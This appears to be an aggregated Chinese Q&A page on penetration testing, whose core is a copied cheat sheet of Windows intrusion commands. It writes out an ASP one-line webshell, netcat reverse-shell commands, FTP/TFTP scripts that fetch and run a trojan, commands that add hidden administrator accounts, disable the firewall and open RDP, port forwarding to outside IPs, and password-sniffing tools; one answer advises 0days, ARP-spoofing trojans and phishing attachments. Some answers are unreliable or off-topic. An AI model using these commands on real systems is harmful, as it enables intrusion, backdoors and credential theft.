1、哪款linux系统是用来渗透的
Kali Linux这款系统是用来渗透的 ,它上面的渗透工具非常齐全,大致分为Web渗透(针对网站)、无线渗透(比如渗透WIFI获得密码)、主机渗透(就是根据主机漏洞进行渗透,主要用nessus和Metasploit),还可以进行密码破解,一般都是字典爆破(破passwd哈希、MD5、rar密码、各种口令),还有社工工具(比较著名的是SET),还有渗透过程中的信息收集方面的工具也很多。
2、通过渗透测试,发现目标主机存在后门木马漏洞、账户安全漏洞、网络SQL注入漏洞怎么解决
可以安装一个电脑管家在电脑上
然后打开工具箱,在里面找到修复漏洞功能
使用这个功能,去修复电脑所有检测出的高危漏洞即可
3、什么是网络渗透
网络渗透是攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时网络渗透也是安全工作者所研究的一个课题,在他们口中通常被称为"渗透测试(Penetration Test)"。
无论是网络渗透(Network Penetration)还是渗透测试(Penetration Test),其实际上所指的都是同一内容,也就是研究如何一步步攻击入侵某个大型网络主机服务器群组。
只不过从实施的角度上看,前者是攻击者的恶意行为,而后者则是安全工作者模拟入侵攻击测试,进而寻找最佳安全防护方案的正当手段。
(3)主机渗透扩展资料
网络渗透攻击与普通攻击的不同:
网络渗透攻击与普通网络攻击的不同在于,普通的网络攻击只是单一类型的攻击。
例如,在普通的网络攻击事件中,攻击者可能仅仅是利用目标网络的Web服务器漏洞,入侵网站更改网页,或者在网页上挂马。也就是说,这种攻击是随机的,而其目的也是单一而简单的。
网络渗透攻击则与此不同,它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。
例如,攻击者会有针对性地对某个目标网络进行攻击,以获取其内部的商业资料,进行网络破坏等。因此,攻击者实施攻击的步骤是非常系统的,假设其获取了目标网络中网站服务器的权限,则不会仅满足于控制此台服务器,而是会利用此台服务器,继续入侵目标网络,获取整个网络中所有主机的权限。
为了实现渗透攻击,攻击者采用的攻击方式绝不仅此于一种简单的Web脚本漏洞攻击。攻击者会综合运用远程溢出、木马攻击、密码破解、嗅探、ARP欺骗等多种攻击方式,逐步控制网络。
总体来说,与普通网络攻击相比,网络渗透攻击具有几个特性:攻击目的的明确性,攻击步骤的逐步与渐进性,攻击手段的多样性和综合性。
4、如何对路由器进行渗透
通过路由器入侵这不是入侵,除非网络管理员把管理员把远程管理路由器;
WEB选项开启,才可能入侵,还需要知道路由器密码,登陆目标的的路由器;
将要入侵的ip所有端口进行映射,映射到外网之后在进行入侵;
常用的内网ip分配都是192.168.0.1 或则10.1,或者是192.168.1.1 这样的Ip段落;
只要能进入路由器WEB管理就能知道对方的内网ip分配情况;
但是进入路由器这关很难, 通过路由器入侵内网,必须有其对外网的IP;
通过各种破解工具破解路由器密码例如Bruter,Web Cracker等;
都是可以破解路由器密码的,然后先找出其中一台主机进行渗透;
将肉鸡映射到外网后,再扫描扫描出所有网段,然后才通过进一步渗透。
5、网络安全中,入侵和渗透的区别
渗透测试为模拟黑客攻击测试,但两者也有区别,渗透测试是“面”的测试,黑客攻击是“深度”测试。前者讲究广泛度,后者讲究破坏性。
6、常用的windows渗透命令有哪些
^echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp
Md hack 创建hack文件夹
本地nc -vv -p -l 端口
服务器 nc路径 -e cmd路径 ip 端口
Rd hack 删除hack文件夹
Type d:\wwwroot\hack.asp 查看一句话木马的内容
Del d:\wwwroot\hack.asp 删除hack.asp
Dir c:\ 查看c盘根目录全部文件夹和文件信息
Tree e:\ 显示e盘文件目录树
reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v portnumber
查看终端确定为3389?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 看看fDenyTSConnections的键值是多少?值为0是开,为1是关
netstat -ano 能看到3389开启?
net stop policyagent
net stop sharedaccess
/c dir d:\freehost\weiquanguang\cnhonker*.* /w/o/s
先net stop sharedacess关闭防火,再net stop PolicyAgent关闭筛选
administrator默认被允许,这种情况下,你需将用户同时加入“Remote Desktop Users”组。
net user xxx pppp /add &net localgroup administrators xxx /add
net localgroup administrators xxx /add
net localgroup “Remote Desktop Users” xxx /add 远程桌面用户允许设置。
gpedit.msc
常用系统小命令
gpedit.msc计算机组策略
compmgmt.msc计算机管理
devmgmt.msc设备管理
diskmgmt.msc磁盘管理
fsmgmt.msc共享管理
lusrmgr.ms本地用户管理
notepad写字板write
services.msc服务管理
开启 telnet
@echo off
sc config tlntsvr start= auto
net start telnet
在CMD模式下结束某一进程
一: 通过tasklist 可以查找到相关进程的PID。
语法:tasklist /svc 通过taskkill pid 可以关掉进程。 语法: taskkill /im 进程名 /f
二: ntsd -c q -p PID 可以强行结束运行进程
zxarps.exe -idx 0 -ip 目标的IP -port 80,21,3389 -logfilter “+post,+user,+pass”
dialupass /allusers /stext “c:\1.txt”
========================================================
query user 查询登陆用户
logoff ID蹬出某用户
net user 查看所有用户
c:\xp3389.exe -a
net user 1 1 /add
net1 localgroup administrators 1 /add
C:\>net1 user guest /active:yes 启用该用户
=========================================================
whoami 查看全系统权限
调系统权限
C:\>c:\windows\system32\cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f
==========================================================
FTP命令行下加账号的命令;很爽。。。
C:\>ftp
ftp> open 192.168.0.22
ftp> quote site exec net.exe user admin$ jinwei58 /add
ftp> quote site exec net.exe localgroup admin$ /add
200 EXEC command successful (TID=33).
============================================================
ftp传马命令
echo open 自己的FTP > cmd.txt
echo 帐户>> cmd.txt
echo 密码>> cmd.txt
echo binary >> cmd.txt
echo get 木马.exe >> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
木马.exe
木马.exe
del cmd.txt. /q
==============================================================
quote site exec net user 用户名 密码 /add 添加用户
quote site exec net localgroup administrators 用户名 /add
tasklist \svc //shell列进程
==============================================================
sql语句加管理用户
Select MyCmd(“net user”);
select state(“net user”)
select cmdshell(“net user”)
==============================================================
netstat -an
1.查询终端开放端口
netstat -an | find “3389″
================================================================
查询终端3389端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber
================================================================
2.开启2003终端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
================================================================
3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
=================================================================
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
=================================================================
5.开启Win2000的终端 (需重启)
先将开启终端的工具上传到目标主机的c:\
然后执行c:\ver3389.exe等待系统重启就可以了
=====================================================================
6.解决终端超出了最大连接数的命令
mstsc /v:ip:3389 /console
=====================================================================
关闭防火墙
net stop sharedaccess
======================================================================
先将双开3389的工具上传到目标主机下的c:\
然后运行命令 c:\3389.exe
======================================================================
Tasklist/SVC >>c:\3389.txt
=====================================================================
查看adsl
Dialupass.exe /allusers /stext “c:\1.txt”
=====================================================================
端口映射篇之lcx使用方法
Lcx 命令
本机运行lcx.exe -listen 3001 3002
c:\lcx.exe -slave 61.184.188.125 3001 肉鸡的内网IP 3389
C:\recycler\lcx.exe -slave 121.61.225.211 3001 192.170.0.23 3389
在本机连接: 127.0.0.1:3002
=====================================================================
这里是nc的命令说明:
2.nc反弹提权:
服务器执行: nc位置 -l -p 8080 -t -e cmd位置
监听本地入栈信息
NC地址 cmd地址
————————————————— -p port 打开本地端口
本地执行: telnet + 服务器IP地址 + 446
————————————————— -t 以telnet形式应答入栈请求
传马命令: tftp -i ip地址 get 木马名字.exe -e 程序重定向
额外:传个NC到Webshell上去,反弹个shell,然后用htran转发端口数据,接着在本地嗅探。
2.降低运行权限
////////////////////////////
现在本地监听一个端口。
nc -vv -l -p 8080
最好是80或8080这样的端口,被防火墙拦截的几率小很多。
在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe
—-===============================================================
1.查询终端端口
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber
通用:regedit /e tsp.reg “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp”
type tsp.reg
2.开启XP&2003终端服务
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber\
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3.更改终端端口为20008(0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 40404:TCP /t REG_SZ /d 40404:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.开启Win2000的终端,端口为3389(需重启)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo “Enabled”=”0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo “ShutdownWithoutLogon”=”0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo “EnableAdminTSRemote”=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo “TSEnabled”=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo “Start”=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo “Start”=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo “Hotkey”=”1″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo “PortNumber”=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo “PortNumber”=dword:00000D3D >>2000.reg
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console
9.调整NTFS分区权限
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
来自文章《windows下面常用的渗透测试命令》
7、我从内网如何渗透外网的主机
内网访问外网交钱就办,无所谓渗透。或者说你是某个单位的不让上网的那种
8、内网个人办公主机渗透高招几何?
你们这些一线的未免也太明目张胆了吧,居然问题提到这里来了,ft。
有内网机器,渗透就是体力活。
最简单有效的就是抓密码然后逐步扩大范围,抓密码的方法多了,不sniffer的话,gina,sam抓回去跑也可以。个人机不好搞的话先搞服务器。
有0day的话也不妨用用,如果您老人家在吴中路,某小p孩偷来卖给你们的重量级漏洞不用等着发霉么。还有word的现在满地都是,赶快发啊,非等补丁出来了才用么。
其他还有些奇技淫巧,比如挂马。一个交换机下面你可以arp欺骗强行挂马,vs2005不是自动升级的,06年那个跨域的不用白不用(还有个wild的oe)。
邮箱如果控制了更好办,抢先替换有用的邮件,加个chm或者doc或者mdb的附件,人家看到熟人的信说不定就打开了。
移动设备感染也可以啊,曰先生写的你们有吧?
……
方法太多了,有上网络问这个问题的时间,说不定都搞下几台了。要过年了,祝你们多拿奖金。
9、假如电脑主机箱上沾了水,但水没有渗透进入主机,对主机内的硬件有伤害吗?
不会有影响的!放心吧!